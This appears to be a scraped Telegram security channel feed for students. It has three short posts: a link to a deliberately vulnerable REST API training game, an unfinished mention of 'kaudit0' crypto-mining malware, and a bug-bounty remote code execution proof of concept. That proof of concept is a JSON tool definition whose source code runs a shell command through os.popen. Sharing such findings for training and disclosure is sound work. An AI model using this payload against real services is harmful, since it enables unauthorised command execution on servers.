SecList for CyberStudents
238 subscribers
580 photos
23 videos
211 files
892 links
Think outside the box
Download Telegram
Forwarded from Brut Security
👨‍🍳 Damn-Vulnerable-RESTaurant 👨‍🍳

⚡️An intentionally vulnerable Web API game for learning and training purposes dedicated to developers, ethical hackers and security engineers.

Get:
https://github.com/theowni/Damn-Vulnerable-RESTaurant-API-Game
I'm going to write about a piece of malware that appears under the name "kaudit0." I did some research, and all the information I found indicates that its purpose is crypto-mining. There isn't much information available about it, but what does exist appears to be credible.

#malware
POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}


#BugBounty #RCE
🔥1